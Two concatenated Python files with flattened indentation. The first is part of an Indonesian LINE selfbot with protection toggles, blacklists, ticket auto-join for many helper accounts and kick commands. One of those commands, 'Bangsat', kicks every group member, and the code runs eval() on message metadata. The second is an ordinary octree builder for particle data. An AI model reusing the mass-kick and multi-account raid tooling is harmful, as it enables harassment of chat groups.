msgs = "Protect invite sudah aktif"
else:
protectinvite.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect invite diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
protectinvite.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect invite dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect invite sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Antijs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Antijs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "Anti JS sudah aktif"
else:
protectantijs.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
protectantijs.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Anti JS Sudah Tidak Aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "Ghost sudah aktif"
else:
ghost.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
ghost.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Ghost Sudah Tidak Aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Allpro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Allpro ','')
if spl == 'on':
#if wait["allprotect"] == True:
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectinvite:
msgs = ""
else:
protectinvite.append(msg.to)
if msg.to in protectantijs:
msgs = ""
else:
protectantijs.append(msg.to)
if msg.to in ghost:
msgs = ""
else:
ghost.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua sudah diaktifkan"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection diaktifkan"
cl.sendMessage(msg.to, "ã Status Protection ã\n" + msgs)
elif spl == 'off':
#if wait["allprotect"] == False:
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectinvite:
protectinvite.remove(msg.to)
else:
msgs = ""
if msg.to in protectantijs:
protectantijs.remove(msg.to)
else:
msgs = ""
if msg.to in ghost:
ghost.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection dimatikan"
else:
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection dimatikan"
cl.sendMessage(msg.to, "ã Status Protection ã\n" + msgs)
#===========KICKOUT============#
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
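# Note (added comment, my reading of this handler): "Nk" kicks through a helper account:
# it temporarily enables join-by-ticket, reissues the group ticket, lets the ghost client
# (sw) join via that ticket, kicks the target, makes sw leave, and then disables
# join-by-ticket again so the group link stays closed.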
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sw.kickoutFromGroup(msg.to, [target])
sw.leaveGroup(msg.to)
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
elif ("Kick1 " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
elif ("Bangsat" in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
group = cl.getGroup(msg.to)
targets = [contact.mid for contact in group.members]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
admin.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
staff.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
Bots.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "admin:repeat" or text.lower() == 'admin:repeat':
if msg._from in admin:
wait["delladmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:repeat" or text.lower() == 'staff:repeat':
if msg._from in admin:
wait["dellstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:repeat" or text.lower() == 'bot:repeat':
if msg._from in admin:
wait["dellbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
cl.sendText(msg.to,"Berhasil di Refresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
if msg._from in admin:
ma = ""
for i in admin:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
if msg._from in admin:
ma = ""
for i in staff:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
if msg._from in admin:
ma = ""
for i in Bots:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========COMMAND ON OFF============#
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
cl.sendText(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["MentionKick"] = False
cl.sendText(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
cl.sendText(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
cl.sendText(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto respon dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
cl.sendText(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
cl.sendText(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
cl.sendText(msg.to,"Autoleave diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
cl.sendText(msg.to,"Autoleave dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "read on" or text.lower() == 'autoread on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "read off" or text.lower() == 'autoread off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
cl.sendText(msg.to,"Deteksi sticker diaktifkan")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
cl.sendText(msg.to,"Deteksi sticker dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = True
cl.sendText(msg.to,"Join ticket diaktifkan")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = False
cl.sendText(msg.to,"Autojoin Tiket dinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"Famz__Botz Blacklist User\n\n"+ma+"\nTotalã%sãBlacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"Famz__Botz Talkban User\n\n"+ma+"\nTotalã%sãTalkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = cl.getContacts(wait["blacklist"])
mc = "ã%iãUser Blacklist" % len(ragets)
cl.sendMessage(msg.to,"Sukses membersihkan " +mc)
#===========COMMAND SET============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Pesan Msg")
else:
wait["message"] = spl
cl.sendMessage(msg.to, "ãPesan Msgã\nPesan Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
cl.sendMessage(msg.to, "ãWelcome Msgã\nWelcome Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
cl.sendMessage(msg.to, "ãRespon Msgã\nRespon Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["ARmessage1"] = spl
cl.sendMessage(msg.to, "ãSpam Msgã\nSpam Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
cl.sendMessage(msg.to, "ãSider Msgã\nSider Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
cl.sendMessage(msg.to, "ãPesan Msgã\nPesan Msg mu :\n\nã " + str(wait["message"]) + " ã")
elif text.lower() == "cek welcome":
if msg._from in admin:
cl.sendMessage(msg.to, "ãWelcome Msgã\nWelcome Msg mu :\n\nã " + str(wait["welcome"]) + " ã")
elif text.lower() == "cek respon":
if msg._from in admin:
cl.sendMessage(msg.to, "ãRespon Msgã\nRespon Msg mu :\n\nã " + str(wait["Respontag"]) + " ã")
elif text.lower() == "cek spam":
if msg._from in admin:
cl.sendMessage(msg.to, "ãSpam Msgã\nSpam Msg mu :\n\nã " + str(Setmain["ARmessage1"]) + " ã")
elif text.lower() == "cek sider":
if msg._from in admin:
cl.sendMessage(msg.to, "ãSider Msgã\nSider Msg mu :\n\nã " + str(wait["mention"]) + " ã")
#===========JOIN TICKET============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group2 = kk.findGroupByTicket(ticket_id)
kk.acceptGroupInvitationByTicket(group2.id,ticket_id)
kk.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group3 = kc.findGroupByTicket(ticket_id)
kc.acceptGroupInvitationByTicket(group3.id,ticket_id)
kc.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group4 = km.findGroupByTicket(ticket_id)
km.acceptGroupInvitationByTicket(group.id,ticket_id)
km.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group5 = kb.findGroupByTicket(ticket_id)
kb.acceptGroupInvitationByTicket(group1.id,ticket_id)
kb.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group6 = kn.findGroupByTicket(ticket_id)
kn.acceptGroupInvitationByTicket(group2.id,ticket_id)
kn.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group7 = ko.findGroupByTicket(ticket_id)
ko.acceptGroupInvitationByTicket(group3.id,ticket_id)
ko.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group8 = kw.findGroupByTicket(ticket_id)
kw.acceptGroupInvitationByTicket(group.id,ticket_id)
kw.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group9 = ke.findGroupByTicket(ticket_id)
ke.acceptGroupInvitationByTicket(group1.id,ticket_id)
ke.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group10 = ky.findGroupByTicket(ticket_id)
ky.acceptGroupInvitationByTicket(group2.id,ticket_id)
ky.sendMessage(msg.to, "Masuk : %s" % str(group.name))
except Exception as error:
print (error)
while True:
try:
ops = poll.singleTrace(count=50)
if ops is not None:
for op in ops:
poll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
thread1.start()
thread1.join()
except Exception as e:
pass
|
octreeStreamMultiprocessing.py
|
''' Attempting to write an octree in python
I want this to work with VERY large data sets that can't be stored fully in memory. So my procedure will be as follows:
- read the file in line-by-line and clear memory every X MB (or maybe every X particles; can I check memory load in python?)
- subdivide down to nodes containing at most N particles
- write out the tree with node sizes and centers, and also the leaf nodes holding the actual particles
'''
import os
import numpy as np
import json
import h5py
import random
from multiprocessing import Process, Manager
#https://stackoverflow.com/questions/56250514/how-to-tackle-with-error-object-of-type-int32-is-not-json-serializable
#to help with dumping to json
class npEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.int32):
return int(obj)
return json.JSONEncoder.default(self, obj)
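# Illustrative usage (a minimal sketch, not part of the original script): passing cls=npEncoder
# lets json serialize numpy int32 values that would otherwise raise a TypeError, e.g.
#   json.dumps({'Nparticles': np.int32(42)}, cls=npEncoder)  # -> '{"Nparticles": 42}'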
class octreeStream:
def __init__(self, inputFile, NMemoryMax = 1e5, NNodeMax = 5000,
header = 0, delim = None, colIndices = {'Coordinates':[0,1,2]},
baseDir = 'octreeNodes', Nmax=np.inf, verbose=0, path = None, minWidth=0,
h5PartKey = '', keyList = ['Coordinates'], center = None, cleanDir = False,
Ncores=1):
'''
inputFile : path to the file. For now only text files.
NMemoryMax : the maximum number of particles to save in the memory before writing to a file
NNodeMax : the maximum number of particles to store in a node before splitting it
header : the line number of the header (file starts at line 1,
set header=0 for no header, and in that case x,y,z are assumed to be the first three columns)
delim : the delimiter between columns, if set to None, then hdf5 file is assumed
colIndices : dict with the column numbers for each value in keyList (only necessary for csv files)
baseDir : the directory to store the octree files
Nmax : maximum number of particles to include
verbose : controls how much output to write to the console
path : the path to the output file
minWidth : the minimum width that a node can have
h5PartKey : if needed, can be used to specify which particle type to use, e.g. 'PartType0'
keyList : Any additional keys that are desired; MUST contain the key to Coordinates first. If blank, then assume that x,y,z is the first 3 columns in file
center : options for the user to provide the octree center (can save time)
cleanDir : if true this will erase the files within that directory before beginning
Ncores : number of cores for multiprocessing
'''
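# Illustrative call (a sketch, not from the original; the file name and column layout are
# made up): for a headerless CSV whose first three columns are x,y,z one might use
#   octreeStream('parts.csv', delim=',', header=0, colIndices={'Coordinates': [0, 1, 2]})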
self.nodes = Manager().list() #will contain a list of all nodes with each as a dict
self.managerDict = Manager().dict()
self.managerDict['inputFile'] = inputFile
self.managerDict['NMemoryMax'] = NMemoryMax
self.managerDict['NNodeMax'] = NNodeMax
self.managerDict['header'] = header
self.managerDict['delim'] = delim
self.managerDict['colIndices'] = colIndices
self.managerDict['minWidth'] = minWidth
self.managerDict['h5PartKey'] = h5PartKey
self.managerDict['keyList'] = keyList
self.managerDict['center'] = center
self.managerDict['Nmax'] = Nmax
self.managerDict['cleanDir'] = cleanDir
self.managerDict['Ncores'] = Ncores
self.managerDict['verbose'] = verbose
if (path is None):
self.managerDict['path'] = os.path.join(os.getcwd(), baseDir)
else:
self.managerDict['path'] = os.path.abspath(path) #to make this windows safe
print('files will be output to:', self.managerDict['path'])
self.managerDict['count'] = 0
self.managerDict['lineN'] = 0
self.managerDict['arr'] = None #will contain the data from the file
self.managerDict['width'] = None #will be determined in getSizeCenter
def createNode(self, center, id='', width=0,):
node = Manager().dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=[], childNodes=[], particles=[], needsUpdate=True)
#node = dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=Manager().list(), childNodes=Manager().list(), particles=Manager().list(), needsUpdate=True)
self.nodes += [node]
print('CHECKING NEW NODE', self.nodes[-1])
return (node, len(self.nodes) - 1)
def findClosestNodeIndexByDistance(self, point, positions):
#there is probably a faster and more clever way to do this
#print('checking dist', point.shape, positions.shape, point, positions)
dist2 = np.sum((positions - point)**2, axis=1)
return np.argmin(dist2)
def findClosestNode(self, point, parentIndex=None):
#I am going to traverse the octree to find the closest node
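# Added note: this is a greedy walk down the tree; at each level we jump to the child whose
# center is nearest to the point. Because the eight children split the parent cube into equal
# octants, the nearest child center corresponds to the octant that contains the point.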
if (parentIndex is None):
parentIndex = 0
parent = self.nodes[parentIndex]
childIndices = parent['childNodes']
while (len(childIndices) > 0):
childPositions = []
for i in childIndices:
childPositions.append([self.nodes[i]['x'], self.nodes[i]['y'], self.nodes[i]['z']])
parentIndex = childIndices[self.findClosestNodeIndexByDistance(point[0:3], np.array(childPositions))]
parent = self.nodes[parentIndex]
childIndices = parent['childNodes']
return (parent, parentIndex)
def createChildNodes(self, parentIndex):
#split the node into 8 separate nodes
if (self.managerDict['verbose'] > 0):
print('creating child nodes', self.nodes[parentIndex]['id'], self.nodes[parentIndex]['Nparticles'], self.nodes[parentIndex]['width'])
#check if we need to read in the file (should this be a more careful check?)
if (len(self.nodes[parentIndex]['particles']) < self.managerDict['NNodeMax']):
self.populateNodeFromFile(parentIndex)
#create the new nodes
#check to make sure node doesn't already exist, since I'm running in parallel?
n1, index1 = self.getNodeByID(self.nodes[parentIndex]['id']+'1')
if (n1 is None):
cx = self.nodes[parentIndex]['x'] + self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] + self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] + self.nodes[parentIndex]['width']/4.
n1, index1 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'1', width=self.nodes[parentIndex]['width']/2.)
n2, index2 = self.getNodeByID(self.nodes[parentIndex]['id']+'2')
if (n2 is None):
cx = self.nodes[parentIndex]['x'] - self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] + self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] + self.nodes[parentIndex]['width']/4.
n2, index2 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'2', width=self.nodes[parentIndex]['width']/2.)
n3, index3 = self.getNodeByID(self.nodes[parentIndex]['id']+'3')
if (n3 is None):
cx = self.nodes[parentIndex]['x'] + self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] - self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] + self.nodes[parentIndex]['width']/4.
n3, index3 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'3', width=self.nodes[parentIndex]['width']/2.)
n4, index4 = self.getNodeByID(self.nodes[parentIndex]['id']+'4')
if (n4 is None):
cx = self.nodes[parentIndex]['x'] - self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] - self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] + self.nodes[parentIndex]['width']/4.
n4, index4 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'4', width=self.nodes[parentIndex]['width']/2.)
n5, index5 = self.getNodeByID(self.nodes[parentIndex]['id']+'5')
if (n5 is None):
cx = self.nodes[parentIndex]['x'] + self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] + self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] - self.nodes[parentIndex]['width']/4.
n5, index5 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'5', width=self.nodes[parentIndex]['width']/2.)
n6, index6 = self.getNodeByID(self.nodes[parentIndex]['id']+'6')
if (n6 is None):
